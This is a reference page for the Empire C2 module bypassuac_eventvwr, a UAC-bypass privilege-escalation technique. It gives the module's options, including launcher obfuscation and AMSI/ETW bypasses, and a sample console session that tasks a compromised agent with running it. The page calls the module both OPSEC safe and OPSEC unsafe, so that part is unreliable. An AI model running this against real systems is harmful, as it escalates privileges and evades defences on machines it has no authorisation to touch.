Invoke-EventVwrBypass - Empire Module
This page contains detailed information about how to use the powershell/privesc/bypassuac_eventvwr Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-EventVwrBypass
Module: powershell/privesc/bypassuac_eventvwr
Source code [1]: empire/server/modules/powershell/privesc/bypassuac_eventvwr.yaml
Source code [2]: empire/server/modules/powershell/privesc/bypassuac_eventvwr.py
MITRE ATT&CK:
T1088
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes
The bypassuac_eventvwr module bypasses UAC by performing an image hijack on the .msc file extension and starting eventvwr.exe. No files are dropped to disk, making this opsec safe.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the bypassuac_eventvwr module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the bypassuac_eventvwr module:
Agent
Agent to run module on.
Listener
Listener to use.
Additional Module Options
This is a list of additional options that are supported by the bypassuac_eventvwr module:
Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw
.
Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False
.
ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1
.
Proxy
Proxy to use for request (default, none, or other).
Default value: default
.
ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default
.
UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default
.
Bypassuac_eventvwr Example Usage
Here's an example of how to use the bypassuac_eventvwr module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/privesc/bypassuac_eventvwr
Author @enigma0x3
Background True
Comments https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-
exe-and-registry-hijacking/
Description Bypasses UAC by performing an image hijack on the .msc file extension
and starting eventvwr.exe. No files are dropped to disk, making this
opsec safe.
Language powershell
Name powershell/privesc/bypassuac_eventvwr
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1088
,Record Options----,--------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------------|--------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|------------------|--------------------|----------|-------------------------------------|
| Bypasses | mattifestation etw | False | Bypasses as a space separated list |
| | | | to be prepended to the launcher. |
|------------------|--------------------|----------|-------------------------------------|
| Listener | | True | Listener to use. |
|------------------|--------------------|----------|-------------------------------------|
| Obfuscate | False | False | Switch. Obfuscate the launcher |
| | | | powershell code, uses the |
| | | | ObfuscateCommand for obfuscation |
| | | | types. For powershell only. |
|------------------|--------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1 | False | The Invoke-Obfuscation command to |
| | | | use. Only used if Obfuscate switch |
| | | | is True. For powershell only. |
|------------------|--------------------|----------|-------------------------------------|
| Proxy | default | False | Proxy to use for request (default, |
| | | | none, or other). |
|------------------|--------------------|----------|-------------------------------------|
| ProxyCreds | default | False | Proxy credentials |
| | | | ([domain\]username:password) to use |
| | | | for request (default, none, or |
| | | | other). |
|------------------|--------------------|----------|-------------------------------------|
| UserAgent | default | False | User-agent string to use for the |
| | | | staging request (default, none, or |
| | | | other). |
'------------------'--------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/privesc/bypassuac_eventvwr.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/privesc/bypassuac_eventvwr.py
- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
- http://attack.mitre.org/techniques/T1088
See Also
Check also the following modules related to this module:
- powershell/privesc/bypassuac_env
- powershell/privesc/bypassuac_tokenmanipulation
- powershell/privesc/bypassuac_wscript
- powershell/privesc/bypassuac_sdctlbypass
- powershell/privesc/bypassuac_fodhelper
- powershell/privesc/bypassuac
- powershell/privesc/winPEAS
- powershell/privesc/sweetpotato
- powershell/privesc/tater
- powershell/privesc/ms16-135
- powershell/privesc/ask
- powershell/privesc/mcafee_sitelist
- powershell/privesc/privesccheck
- powershell/privesc/sherlock
- powershell/privesc/ms16-032
- powershell/privesc/zerologon
- powershell/privesc/printdemon
- powershell/privesc/getsystem
- powershell/privesc/gpp
- powershell/privesc/watson
- powershell/privesc/printnightmare
- powershell/privesc/powerup/service_exe_useradd
- powershell/privesc/powerup/write_dllhijacker
- powershell/privesc/powerup/service_stager
- powershell/privesc/powerup/service_exe_restore
- powershell/privesc/powerup/service_exe_stager
- powershell/privesc/powerup/find_dllhijack
- powershell/privesc/powerup/service_useradd
- powershell/privesc/powerup/allchecks
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.